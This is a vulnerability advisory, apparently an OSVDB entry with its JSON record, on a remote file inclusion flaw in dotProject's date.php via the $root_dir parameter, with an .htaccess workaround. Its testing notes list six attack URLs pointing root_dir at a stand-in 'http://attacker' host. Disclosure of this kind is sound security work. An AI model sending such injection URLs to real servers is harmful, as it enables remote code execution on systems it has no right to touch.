dotProject classdefs/date.php $root_dir Arbitrary File Include
2003-01-29T00:00:00
ID OSVDB:3592 Type osvdb Reporter OSVDB Modified 2003-01-29T00:00:00
Description
Vulnerability Description
dotProject contains a flaw that allows a remote attacker to include arbitrary files. The issue is due to numerous scripts that call the classdefs/date.php script without defining or restricting the $root_dir variable. This allows an attacker to set the variable to an arbitrary server/path/file name which may include malicious commands that would be executed on the vulnerable server.
Solution Description
Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround:
create a .htaccess file that contains 'Deny from all' in the /modules/ directory.
Short Description
dotProject contains a flaw that allows a remote attacker to include arbitrary files. The issue is due to numerous scripts that call the classdefs/date.php script without defining or restricting the $root_dir variable. This allows an attacker to set the variable to an arbitrary server/path/file name which may include malicious commands that would be executed on the vulnerable server.
Vendor URL: http://www.dotproject.net/
Secunia Advisory ID:7974Related OSVDB ID: 3593
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-01/0344.html
ISS X-Force ID: 11192
Bugtraq ID: 6710
{"id": "OSVDB:3592", "bulletinFamily": "software", "title": "dotProject classdefs/date.php $root_dir Arbitrary File Include", "description": "## Vulnerability Description\ndotProject contains a flaw that allows a remote attacker to include arbitrary files. The issue is due to numerous scripts that call the classdefs/date.php script without defining or restricting the $root_dir variable. This allows an attacker to set the variable to an arbitrary server/path/file name which may include malicious commands that would be executed on the vulnerable server.\n## Solution Description\nCurrently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: \ncreate a .htaccess file that contains 'Deny from all' in the /modules/ directory.\n## Short Description\ndotProject contains a flaw that allows a remote attacker to include arbitrary files. The issue is due to numerous scripts that call the classdefs/date.php script without defining or restricting the $root_dir variable. This allows an attacker to set the variable to an arbitrary server/path/file name which may include malicious commands that would be executed on the vulnerable server.\n## Manual Testing Notes\nhttp://[victim]/dotproject/modules/files/index_table.php?root_dir=http://attacker\nhttp://[victim]/dotproject/modules/projects/addedit.php?root_dir=http://attacker\nhttp://[victim]/dotproject/modules/projects/view.php?root_dir=http://attacker\nhttp://[victim]/dotproject/modules/projects/vw_files.php?root_dir=http://attacker\nhttp://[victim]/dotproject/modules/tasks/addedit.php?root_dir=http://attacker\nhttp://[victim]/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker\n## References:\nVendor URL: http://www.dotproject.net/\n[Secunia Advisory ID:7974](https://secuniaresearch.flexerasoftware.com/advisories/7974/)\n[Related OSVDB ID: 3593](https://vulners.com/osvdb/OSVDB:3593)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-01/0344.html\nISS X-Force ID: 11192\nBugtraq ID: 6710\n", "published": "2003-01-29T00:00:00", "modified": "2003-01-29T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/osvdb/OSVDB:3592", "reporter": "OSVDB", "references": [], "cvelist": [], "type": "osvdb", "lastseen": "2017-04-28T13:19:58", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "3e9850fae030a739259d9f83e3f72f2e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "b34ef7618431bd84815d2a79fad5dc8f"}, {"key": "href", "hash": "915dd5cbc5fe791777ca72bca3a2435d"}, {"key": "modified", "hash": "b67c1dfa4370b6f104604c30732020d8"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "b67c1dfa4370b6f104604c30732020d8"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "ee95b064a4456b6a8c2b902b20208499"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "hash": "351ed339ccb54983e590bc335c39372e477852dc2bd9d6b386a484599d2826c6", "viewCount": 0, "objectVersion": "1.2", "affectedSoftware": [{"name": "dotProject", "operator": "eq", "version": "dev20030121"}], "enchantments": {"vulnersScore": 5.0}}